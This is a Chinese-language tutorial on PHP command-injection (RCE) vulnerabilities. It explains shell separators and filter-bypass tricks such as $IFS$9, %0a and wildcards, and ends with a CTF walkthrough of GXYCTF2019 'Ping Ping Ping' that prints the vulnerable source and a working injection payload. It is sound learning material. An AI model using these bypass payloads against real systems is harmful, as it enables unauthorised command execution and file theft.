RCE命令执行

 

 

RCE英文全称：remote command/code execute（远程命令/代码执行漏洞）

分为远程命令执行ping和远程代码执行eval。

exce(ping)远程系统命令执行

1.原理

以PHP为例，`system、exec、shell_exec、passthu、popen、proc_popen`等函数可以执行系统命令。当我们可以控制这些函数的参数时，就能运行我们想运行的命令，从而进行攻击。

2.利用管道符来实现

主要是win和Linux，管道符两边的语句之间可有空格，也可以没有

2.1掌握有关命令执行的知识

windows 或 linux 下:

command1 && command2 先执行 command1，如果为真，再执行 command2

command1 | command2 只执行 command2

command1 & command2 先执行 command2 后执行 command1

command1 || command2 先执行 command1，如果为假，再执行 command2命令执行漏洞

（| || & && 称为 管道符）

2.2 Linux特有的

；无论真假都执行跟&一样

3.绕过方法

3.1过滤cat

cat的目的就是打开指定的文件，只需要将cat换成其他的打开文件的命令就行了，整个过程还是一样的，还有就是直接在cat中插入\变成c\at，也可以绕过过滤。
 cat 由第一行开始显示内容，并将所有内容输出
 tac 从最后一行倒序显示内容，并将所有内容输出
 tail 只显示最后几行
 nl 类似于cat -n，显示时输出行号
 tailf 类似于tail -f
 more 根据窗口大小，一页一页的现实文件内容
 less 和more类似，但其优点可以往前翻页，而且进行可以搜索字符
 head 只显示头几行

3.2过滤空格

使用< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、$IFS$1 来代替空格

3.3过滤目录分割符

cd是进入文件夹，而cat是打开文件

绕过方法：`cd flag_is_here;ls`=`ls \flag_is_here`

3.4管道符过滤

1.用`;`或者其他管道符`127.0.0.1;ls`

2.如果已知flag文件名，则使用base64`base64 1.php`相当于`cat 1.php|base64`

，输出的是base64后的

3.假如`;`也被过滤的话，则用%0a（;，为url 编码）,但要注意要在url上打

3.5字符绕过（如flag、php）

利用通配符？*`127.0.0.1|cat fal?.php`

4.实战

做个[GXYCTF2019]Ping Ping Ping

源码

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

?>

过滤了很多东西但是发现了一种方法可以绕过

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

我们通过;来拼接执行执行代码，通过$IFS$9绕过空格限制，然后拼接指令即可，但这里过滤了flag，要绕过正则匹配必须fl写在后面的哪个变量中